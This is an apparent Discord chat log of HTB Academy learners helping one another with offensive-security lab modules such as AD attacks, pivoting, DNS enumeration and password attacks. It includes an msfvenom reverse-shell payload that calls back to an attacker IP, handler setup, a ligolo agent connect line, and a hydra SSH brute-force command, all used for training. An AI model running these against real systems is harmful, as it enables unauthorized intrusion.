i dont know anything about parrot specifically but yes i would assume you need to download the iso file from the parrot website to use in vmware

with what

Send the contents of the flag.txt file to the administrator's desktop on the DC01 host.
AD Enumeration and Attacks - Skills Assessment Part II module

Comrades I am trying to get a shell on the windows pivot host (172.16.7.50) to my attacking machine but at the time of executing the payload with the user CT059 I did not get a response in the metasploit I am doing it in the following way someone could help me if I am having an error as such to have a shell:

-msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.7.240 -f exe -o shell.exe LPORT=8080
msfconsole -q
Set Payload Windows/x64/MeterPreter/reverse_https
lhost set 0.0.0.0
lport 8000 set
exploit
ssh -R 172.16.7.240:8080:0.0.0.0:8000 htb-student@10.129.254.73 -vN

Why are you doing 172.16.7.240:8080:0.0.0.0:8000?

guys can someone help with the metasploit module?

I use port forwarding to forward connections from port 8080 on the pivot server to the msfconsole esucha service on port 8000 and the -vN argument so that it doesn't prompt for logon

You are forwarding from 172.16.7.240 to 172.16.7.50

Correct?

You need to SSH into 172.16.7.240

Not 10.129.254.73

Also instead of 0.0.0.0 you should specify the specific ip you want to forward to

What's the issue?

So for example:

ssh -R 172.16.7.240:8080:173.16.7.50:8000 CT059@172.16.7.240 -vN

Actually, they are windows hosts without SSH installed aren't they. In that case you will need to use something else

But you can complete the entire module without any pivoting/ port forwarding, it was designed to be independent of the pivoting module

Olá

In the pivoting module they explain an exercise similar to the one I am doing but I do not get the shell

I think you are right because I wanted to practice that topic as such since I am from a network that I cannot communicate to my attacking machine

You're 10.x.x.x machine isn't aware of the traffic being sent to 172.16.7.240, only 172.16.7.240 itself has the 'power' to forward traffic bring sent to it

Fair enough, you can certainly do it

However SSH will not work because the hosts do not have SSH running , you will need to use something like chisel or ligolo etc

If that's why I have to route traffic from the pivot host to communicate with my 10.10.x.x

well i can't find the flag.txt even so i entered the adminstrator desktop

Yeah

Sometimes the flag names are random alphanumeric characters instead of just flag.txt

I am checking the service on the machine winwdos and I have no response
netstat -an | Findstr :22

Yes exactly, SSH is not running

Hence SSH port forwarding will not work on 172.16.7.240

I would recommend one of the other tools in the pivoting module like chisel, since I am assuming you have done it

thanks friend

Hello, I'm currently doing the AD Enumeration & Attacks - Skills Assessment Part I
I'm having trouble with using PowerView on the remote target. I switched from the antak.aspx web shell to a msfvenom windows/shell_reverse_tcp and I uploaded the PowerView.ps1 file but when I import it with:

Import-Module C:\PowerView.ps1
Or:
. C:\PowerView.ps1
It doesn't let me use simple PowerView commands such as:
Get-ADDomain
However, when I run the:
Get-Module
Command, I do see PowerView, I just don't see anything in its "ExportedCommands" field.
Does anyone know how to import PowerView successfully? Or should I use a different rev shell?

oh but how to use meterpreter cuase i kinda missed up and don't know how to use it

It's similar to a Unix shell. For extra commands you can type help. If you want to drop onto an os shell you can use the shell command. There are references online for how to use meterpreter

does finishing soc analyst job path gives cert when finished? hoping to add it as credentials for my resume

What error message are you getting when you try and run Get-ADDomain? Is it command not found?

You get the cert from attempting and passing the exam. I believe all completing the path does is give you a badge on htb academy

Hello, the error message is: Get-ADDomain : The term 'Get-ADDomain' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
So yes the command is simply not found

Here's the output for the Get-Module command (I changed the PowerView.ps1 module to pv.ps1 for simplicity):
**PS C:> Get-Module

ModuleType Version Name ExportedCommands

Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Con...
Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...}
Script 2.0.0 PSReadline {Get-PSReadLineKeyHandler, Get-PSReadLineOption, Remove-PS...
Script 0.0 pv
**

U could try:

Removing and then re importing the module

Running powershell with execution policy of bypass

Resetting the lab

And make sure that you definitely have the right script, it should be like 20000 lines long or something,

"Running powershell with execution policy of bypass" I'm not sure what that means but I've tried the rest of your suggestions already and none worked. I found the PowerView.ps1 script right where the resource Tools-of-the-Trade.txt suggests. It's 20914 lines long and 770280 bytes.

I even went as far as opening a rdp server on the target and connect to it just to make sure it's not a problem with the reverse shells I was using, and now, I connect with rdp run the same commands and get the same errors.

I just restarted the target and redid everything and I still am unable to successfully use the command from the PowerView module... It's so annoying
I also tried to run powershell with the option:

powershell -ExecutionPolicy Bypass
Like you said but it still fails to correctly load the PowerView.ps1 module.

can anyone help me with AEN double pivot part in post exploitation

i am using ligolo-ng for double pivote when i connect from ad machine to my kali connection is made but my machine is forcefully closing it

i used chisel

even meterpreter but things is not working

Are you using the right ports?

yes i have tried many port like default 443 80 8080 and many more

do not join that

thats a scam

For the pivots, default is 11601 you use that if you used 11601.

agent.exe -connect yourip:11601 -ignore-cert

sorry but it is not working

ERRO[0419] dial tcp 127.0.0.1:11601: connect: connection refused

this is the error my machin throwing

did you add a listener, I send you a dm

Hi

hello

got a problem?

firewalls in linux fundamentals is confusing, it looks there's an overlapping between the components of iptables, like chains manages traffic but also rules & targets apply set of actions to network traffic based on criteria, & so on and so forth..

Hello, if you happen to be familiar with the AD enumerations and attack module, I posted a question just above, I can't get the second question because I can't manage to import the PowerView module

and like matches are another layer to specify whether rules should be applied or not

I have not done that module, sorry

The C2 Sliver module web01 rdp machine is not working, sometimes it connects then dc's again after 10 seconds.

I did the module, you can dm if you want

Maybe try a different revshell. Revshells has one i would try.

wdym? the linux fundamentals module only touches on these topics on a very slight sense, firewalls and docker and maybe some other too, I cannot remember. but there aren't even neccessary commands to pass that part of the module

I tried the windows/x64/meterpreter/reverse_tcp and windows/shell_reverse_tcp ones

Try a PS one. You can DM if you'd like.

yea there aren't,
I was just confused by the explanation,
lots of the components seem to be doing the same things more or less
I need to practise them to understand more articulately

ye, you could try more deeply research on these topics, althought there is no firewall module for htb academy, the closest you can get to that is the ids/ips module

right,
I will do that on my own ig, I just think it's major to be able to apply the technologies mentioned in the module,
I think blue teaming deals with firewalls, ids a lot

but if I just read the module it's honestly as if I'd just read the header of the section

there are some parts of the modules that only have reading parts, you have to get used to it. maybe you could try some different practices with the given tools but I don't know how much that would pay out

there are some modules that are straight up reading

almost all of those are tier 0

there are some in tier 1 too

about 8 in tier 0
4 in tier I
and 1 in tier II

although the one in tier 2 has a pretty big skills assesments, it's the documentation and reporting module

that's cool, my plan is to finish the information security foundations path & get back to pwning machines on HTB

Looking for directional help.. not sure if this is the place but I signed up for hack the box yesterday with the intentions of learning pen testing after doing research and listening to podcasts, true crime etc lol… I figured that cracking into hard drives and what not for a legal case would be a cool job is pen testing the right path for this? Or is that just a skill I would learn along the way as I progress through the pen testing journey?

cracking into hard drives for legal stuff is more digital forensics, pentesting doesn't have you crack hard drives

as pentesting has you attacking machines that are running (thus eliminating the need to crack the hard drive)

and generally requires some specialized software in order to maintain the integrity of the drive; with digital forensics you have to log every action you take

I am working on the macOS fundementals module and im not certain it is spawining correctly. When I open the instance its just a linux machine. No mac or any indication of how to connect to a mac machine.

the mac fundamenntals module requires you to have a MAC device

seriously? that is a strange requirement.

it's because emulating a macOS device is basically impossible since they don't make their image publicly available

I guess I wont be finishing this module today then

Hi @fathom pendant if you're cool with it, do you mind if I speak to you in DMs regarding cyber security? It might be a back & fourth thing which is why I don't want to mix up this channel 😅

Did anyone else have issues with formatting your answers in network traffic analysis module? For most I have gotten to the right result by spamming modifications of my original answer but with interrogating network traffic with capture and display filters I have tried so many inputs including the not from the hint and copying the line of text from the cheat sheet but nothing seems to work

Ip:port ip:port
Ip port ip port
Ip.port ip.port
Ip:port > ip:port
Ip port > ip port
Ip.port > ip.port
Same with and same with server and
Any advice?

Shells and payloads live engagement:

Host 1 - managed to upload a jsp shell from laudanum, and using ||hostname|| got me the answer for part 1, but it seems like no other command I use is working... any nudges?

Sounds like you want a DFIR course (digital forensics and incident response)

can someone help in ssrf skills assessment?

I feel lost in all of this info. I am trusting the process and going through the tier0 and up modules but it feels like so much info that I don’t know how it will all come together.

I don’t want a job in cybersecurity. I just want to be able to effectively go through the CTF and such

So i'm doing the Hacking Wordpress module and I'm running across a problem with wpscan

I had to use sudo gem install wpscan to get it to download

you could totally do it without a macos

most of the questions are informational

others you can ask chatgpt

Hi guy is there a order to follow the module in pentester path? Or are they already in "order" to follow ?

Yes, they are generally structured to build upon previous concepts so be sure to follow the order

Thank you alex

If you are interested in the knowledge to do boxes just enjoy the process, take good notes and allow enough time no pressure and eventually you’ll get there. John Hammond put a good video on YouTube the other week talking about mindset when feeling swamped. Good 10 minute watch

I need help on Attacking Common Applications, Attacking Web Client Applications. I did all the steps to create a new .exe via .\monty.bat. But now when I put it into the debugger I found the only MAP --rw- but when I double click on it no strings show up. For some reason when I do memory dump on the new .exe file, its the same as the first .exe they provide us, no different info in debugger.

did you set the breakpoints properly?

Yes and I restarted the debugger as well to save changes.

you don't restart the debugger, you restart the program you're debugging

aka the debugee

When the debugee didnt give me wanted results, I just closed and reopened the debugger, so how can I restart the debugee? Without closing and opening the debugger.

alternatively; start up the debugger -- set the breakpoint option -- then open the program you're debugging

just re-run the program you're debugging

Hi

I tried that and it gave the same results as the first .exe file.

i didn't have any issues doing it as shown ¯_(ツ)_/¯

Hi! I have a question. Does anyone know about these modules? I'm a bit confused about where the user 'bob' and the password come from. It didn't teach us how to obtain that. I have all the flags and the password, but my question is: how do I obtain the user 'bob'? Where did he come from?

Thank you. I appreciate this.

You don't, the modules sometimes give you information to use. I don't believe there's a feasible way to bruteforce that info

As that's the getting started module, they aren't looking for you to do anything complex

Sometimes the modules are propped as you working with a team

Hi. I'm doing the Password Mutation section within the Passwords Attacks Module

I have to create a mutated wordlist using the files under "Resources" to brute force the password for the user "sam" of the ssh service

To do this I used the custom.rule given and the password.list to create a custom wordlist using with hashcat hashcat --force wordlists/password.list -r custom.rule --stdout > mut_password.list
(password.list and custom.rule are given)

And executed the attack with Hydra
hydra -l sam -P mut_password.list ssh://$IP -I
The "problem" is that the custom wordlist is 187775 words long and hydra says it will take around 33h to complete [STATUS] 94.14 tries/min, 659 tries in 00:07h, 187113 to do in 33:08h
Is this the right approach?

is academy extra laggy just for me 2day or is it just how the current state

20 seconds for an ssh prompt

then another 20 to enter the pass, then another twenty, then hangs

across few modules

Im pretty sure it lets you filter some of it with an attack, and if it can't, wait 30 minutes.

ahhh.. i stuck 2 days to find the answer. ok ok noted. Will jump to next lvl. Thankssss

You're missing the | sort -u option, the cheatsheet is missing that

I'm trying to do a nessus skills assesment (https://academy.hackthebox.com/module/108/section/1233), but I'm stuck on the first question. I can't find the name of the SMB share. Here's what I see: https://cdn.discordapp.com/attachments/1194115213813883030/1331747211654201356/E4C2EA71-C3B1-47A5-AE01-83E54B139015.png?ex=6792bdbd&is=67916c3d&hm=03325b157c5f6c00e4d43baf76db5bfd36bda6f89da263fb7cd9780496c2fe2e&

are you looking at the right target? also i suggest reading and following #welcome so you can share screenshots

also might not be under

vulnerabilities

there's only one host, and these are the only available options in nessus:

• hosts
• vulnerabilities
• remediations
• VPR Top Threats
• History (the one entry doesn't work for some reason)
• Configure
• Audit Trail
• Launch
• Report
• Export
  what option will give the name?

are you using the pre-run scan?

that was a thing?

yes

yep

authed or unauthed report?

i waited like 30-40 mins for each scan 😭

the authed one

I'm going through the pivoting, tunneling and port forwarding module and ANYTIME I run nmap via proxychains, all the ports are ALWAYS shown as filtered?

try running with sudo

here's the full nessus page: https://cdn.discordapp.com/attachments/1194115213813883030/1331749342192730262/769879D9-881B-49C2-BCB4-9161110930A1.png?ex=6792bfb9&is=67916e39&hm=2dd457d4763566360aabb99b1abae21b744f426c2d7677b5c70cbf0d243777dc&

check the info ones

It does work, thanks! But there's no sudo in the examples, did I miss something?

literally one of the info ones says "SMB share enumeration"

scroll a bit

oh ok that works ty

"where shares"
"Definitely not in the one that says 'share enumeration'"

:( didn't think to look for anything like that

not sure, i just know sudo works lol

i just have a alias for it so i dont forget alias pxc='sudo proxychains'

Anyone know where I am making a mistake here? To my knowledge proxychains and chisel r configured correctly though it's been awhile

ICMP echo requests don't like socks

Where or who can I contact, regarding a correction on one of the questions in the modules?

#1234357888114364508

I've run "proxychains nmap -sS --top-ports 100 172.16.6.1/24" as a sanity check and I'm still unable to find a live host surely there's something I've missed

it would help to say what module you're doing

AD Enumeration & Attacks - Skills Assessment Part I

ah

also i suggest running proxychains with sudo

sudo proxychains <command>

i personally use ligolo for my pivoting needs, as it doesn't mess with socks or anything like that

I like ligolo quite a bit more but I was hoping to revisit some older tools

I'm realizing my chisel versions may not be compatible with one another but I can't say for sure thats the issue

that can be an issue

you always wanna make sure agent/proxy tools are on the same version

Definitely

Don't know why I'm just realizing this now

is anyone having issues connecting to endpoints on the VPN?

nvmd. seems to just be the box for asreproasting in linux. moving to other modules for now

Update: it isn't a compatibility issue I'm dumbfounded 😪

. ..

Hello excuse me, i am at DNS enumeration section, in the last question

i am a bit confused. i assumed to do it, we have to enum all the subdomains, using wordlists

but i tried them all already, and non found the host so

i tried then to enumerate authoritative servers

i didn't have a luck to do it

subdomains of subdomains exist

you're not gonna get much off of public authoritative servers

since these are private clients

the dns server is the ip given

thing is, i tried to enumerate those as well, no luck

dig should find you all the base subdomains to enumerate

right, but the sub domain that i found is

after that other bruteforce tools can get you further

ns

doesn't sound right

are you doing dig axfr inlanefreight.htb @ip?

what's inlane.freight.htb?

:P

:P

i made a typo hahahaha

i suggest not revealing subdomains that you've found

but i can guarantee you you overlooked a subdomain to use a bruteforce tool on

ahhh yeah i didn't find it tho, it's in the page itself

even still

this is the footprinting module yeah?

yes that's it

i am even using dnsenum tool to do all of these but i am sure i tried to bruteforce over the subbdomains i found

but dnsenum should work for one

make sure you're using a more fierce wordlist

not all wordlists are created equal

wait tho, hmmmmmmmmmmmmmmmm

i might have misunderstood something

so A record can be also a dns server?

i can 100% guarantee the name of the subdomain isn't in the subdomain-topX-

not NS?

only NS records are NS

thing is, i tried all the wordlist based on the hint that is found in seclist

hmmmmm let me check tho

fierce is the only hint here

i found fierce i wanted to use it

but i didn't preceed

¯_(ツ)_/¯

because it's not in the module

don't make assumptions

the thing is i can't know if i am doing something wrong, or do i need to search for tools myself

always work to rule something out instead of making assumptions, the only general assumption you can make is to not use enormous wordlists for bruteforcing

in the DNS section module, fierce wasn't discussed

ok and?

i can guarantee you that it's not in the subdomains-topX wordlists

how can i know if i am understanding something wrong, or i have to search?

the hint is enough to tell you that you should be trying different wordlists than what's shown

i did try the seclist not the subdomains-topX

but the other ones

there's multiple lists in seclists

i did all the subdomains one

except fierce

but maybe i missed one here or there

:P

hmmmm let me see if it exists hahaha

hmmmmmmmmmmmmmmmmm

i really think i used fierce tho, it immidiately stroke my attention

hmmmmmmm

you said only NS records has a DNS server right?

but then in that case, why do i see that subdomain that i entered (but you deleted) listed in as an A record?

not what i said at all

ahhh so

NS isn't DNS?

just that the name server will exist as NS

it is

https://www.cloudflare.com/learning/dns/dns-records/

yes yes, okay so you mean only NS is NS but NS can be A

i misinterpreted your answer

no, NS is NS

not A

but i mean in the end, to get the IP of the DNS we need an A record no?

not really

hmmmm but the subdomain inte*** (censored for answer) doesn't exist as NS but as A when dig is used on the inlanefreight.htb domain

yes, but that isn't a name server

but hmmmmmm why was i able to get the zone file of it then?

it's another zone, hence why you can transfer to it

ohhh? a zone isn't a DNS then?

nope

i thought a zone is stored on DNS

not always

i see i see, the part of a zone confused me, since i never used a zone before, i didn't have experience with it, but ah i see i see

the base domain happens to hold the zone records and happens to be the name server for both the base domain and the other domain you can transfer to

the cloudflare link i sent early explains records

I will read it! thank you!

well it allows you to transfer to the other domain at least

not necessarily that it holds both

also remember when you query a zone the result you retrieve is from the perspective of the server

so something being 127.0.0.1 on the server, for instance, means that it is on the same machine

right, an internal server

so no access to it, a localhost

not necessarily no access to it

i mean machines in the same network can access it

just that it exists on the same IP/server

not what i meant

at least when i created a network app, i was able to access a localhost from a device on my network but anyone outside of my private network, no access to it

that's a separate thing

the records just state that the object that you might be looking for exists in x location under y name

localhost for zone records simply means that it doesn't need to travel anywhere else to give you the info

think of it as next hop info

hmmmmmmmm

does that exist on the link you sent?

to understand in more details?

i mean

i can search! but thank you! i will be reading more on that!

think of it like someone asking if someone lives somewhere right?

say someone calls and asks if other people live there, if you answer yes each person would be a different answer that would be returned

if they ask if someone specific lives there but you say no, and you know where they Do live you tell them they exist at this other address

ohhhh so 127.0.0.1 just means it exists here?

like in the queiried dns i assume?

the info queried exists on the queried server?

also hmmmmmmmmm

i used the wordlist we discussed before

to enumerate for the requested domain

using dnsenum to bruteforce the domains

but i got the subdomains

but after i used those subdomains i found

i was unable to bruteforce them to find subdomain of a subdomain

working fine on my end

i used dnsenum to try to use the

like i took the found subdomains and i subbed them instead of the inlanefreight.htb

what i did here should be correct, or is that where it's wrong?

yeah i am getting NS record query failed: NOERROR

when it failed, i went and i tried to dig for the data because i was like maybe i missunderstood something, but also no data was found, like dig for any and axfr

you should be replacing inlanefreight.htb with subdomain.inlanefreight.htb

exactly

what i did, but i am getting NOERROR

you won't find anything with dig; that's why you need to bruteforce it

hmmmmmmm should i try the pwnbox in that case?

shouldn't matter using pwnbox

dm me your syntax

sure!

it's likely you are doing something silly

is there a way to do detailed queries of AD group/members (i.e. not just list all groups, all members etc) from a linux host on an internal network? i have creds for a user, and I'm trying to find what groups they are a part of.

ldapsearch and bloodyAD

bet

ill have a look, thanks

Hi there, i need help with the module "USING WEB PROXIES", and I have trouble getting Burp Suite to intercept traffic from NMAP and METASPLOIT.

Have followed the exact steps to configure proxychain and Burp Suite on pwnbox, as well as trying the same methods from Kali - but both contexts I was unable to see the HTTP history on NMAP

I've checked the HTB forums, there were several threads created on this but no clear resolution to issue.

Hope someone can point me towards the right direction

i believe with nmap you can use --proxies option

yeah this is the command issued "nmap --proxies http://127.0.0.1:8080 94.237.62.3 -p56005 -Pn -sC"

but i never bothered with, or trying to use nmap with burp

also generally you don't need to nmap an IP:PORT given by htb

(i know you're doing this to test/try)

but often burpsuite is better suited for web enum, so it's just better to do web stuff and have it capture that

hmmm. i managed to intercept traffic from metasploit on my kali vm

but not nmap

Thanks a lot, I was trying to resolve this task for few days and with your advices I finally did it

okay managed to get the solution for USING WEB PROXIES/PROXYING TOOLS "running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp"

Just finished the Windows Event Logs and Finding Evil module for the CDSA path. I'm curious as to what those who completed it thought about that module

just did a quick search and understanding for how the dnsenum tool works to bruteforce those pesky subdomains that's required for the footprinting module DNS enumeration; it's basically like running
ns lookup wordlistitem.queried.domain nameserver or
dig wordlistitem.queried.domain @nameserver

so in theory instead of using dnsenum you could use one of those tools with a loop function to query :)

Had one of the better skill assessments in the path, good challenge and the questions made sense.

SMBmap doesnt recognize -R option to specify a share anymore, and it just hangs when using -s instead

Your screenshot contains a username and pw

Anyway can't you sign into the machine directly to spray?

id prefer to practice w/ tools on both OS's

its not spraying anymore, just enumerating shares

I suggest resetting the target or setting the timeout limit, i forget the flag for it

just to confirm-this is abnormal for smb right

mainly wanted to make sure im not misunderstanding the command

Correct timeout isn't normal

Unless you have some abnormal connection speed to begin with

I.e. 1000ms ping

--smb-timeout 5

Hello guys, i need help with an HTB module, in the windows attacks and defense "Kerbroasting" in the second question, i can't connect to DC1 to check the EventViewer, if anyone have any suggestions

how are you trying to connect?

using bob's account

the instructions say to use htb-student's account to connect

using rdp?

yeah

you connect to the target spawned machine, then you can use RDP within the spawned machine to reach the DC

Got it! Thank you

Have anyone ever had this Ligolo error? Not sure what the problem is since I use -selfcert (tried -autocert) aswell

Not sure what you're trying to do here tbh as a lot of the functions are inside the tool interface itself

The error is stating that it doesn't have the cert files to launch ssl layer

https://github.com/nicocha30/ligolo-ng/wiki/Quickstart

Also suggest running ligolo with sudo/root perms

Hello guys I'm beginner

I want to learn hacking

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

it would be very nice if we could close the banner announcement and align the content to the center by hiding the table of contents.

use /feedback

(hit enter after /feedback, it'll give you a feedback pop-up. I thought I was supposed to type it in the message and had to type it twice)

thanks

Is this the right channel to ask questions about HTB academy modules & problems?

yes

Great, thank you

Guys
My insta acc is gonna get permanently deactivated
And I want to get it back

Anyone having any trouble with the WordPress/WPScan modules on the Pentester Pathway? I get the following when trying to use it:
Scan Aborted: metadata.json: checksums do not match. Please try again in a few minutes.
I've waited a full day and it still doesn't work. Can't find much reference to it online and no solutions anywhere? Anyone know how to fix it?

reach out to instagram's support, we cannot help you here

which section is that?

https://academy.hackthebox.com/module/113/section/1208